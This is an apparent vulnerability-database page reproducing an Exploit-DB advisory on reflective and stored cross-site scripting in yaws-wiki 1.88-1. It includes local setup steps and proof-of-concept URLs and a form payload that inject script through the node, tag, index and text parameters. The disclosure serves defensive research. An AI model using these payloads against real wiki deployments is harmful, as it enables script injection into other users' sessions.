Reflective and Stored XSS in yaws-wiki

vendor:

yaws-wiki

by:

Michael Brooks

8.8

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: yaws-wiki

Affected Version From: 1.88-1

Affected Version To: 1.88-1

Patch Exists: NO

Related CWE: N/A

CPE: a:yaws:yaws-wiki

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Erlang

2020

Reflective and Stored XSS in yaws-wiki

yaws-wiki version 1.88-1 is vulnerable to both reflective and stored XSS. The vulnerability exists in the editTag.yaws, showOldPage.yaws, allRefsToMe.yaws and editPage.yaws pages. An attacker can inject malicious JavaScript code in the 'node' parameter of the editTag.yaws, showOldPage.yaws and allRefsToMe.yaws pages and in the 'text' parameter of the editPage.yaws page.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.

Source

Exploit-DB raw data:

Application: yaws-wiki
version affected: 1.88-1
platform:  Erlang
homepage:http://yaws.hyber.org/
Researcher: Michael Brooks
Orignal Advisory:https://sitewat.ch/en/Advisory/4

Install instructions for Ubuntu:
sudo apt-get install yaws-wiki

Edit:/etc/yaws/conf.d/yaws-wiki.conf
#add this:
<server wiki>
 port = 8181
 listen = 0.0.0.0
 docroot = /var/lib/yaws-wiki
</server>

Then restart yaws:
sudo /etc/init.d/yaws restart


Reflective XSS:
http://localhost:8181/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://localhost:8181/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

Stored XSS:
http://localhost:8181/editPage.yaws?node=home

The large textbox on the editPage.yaws page is vulnerable to xss.  This is
the"text" post variable:
<script>alert(1)</script>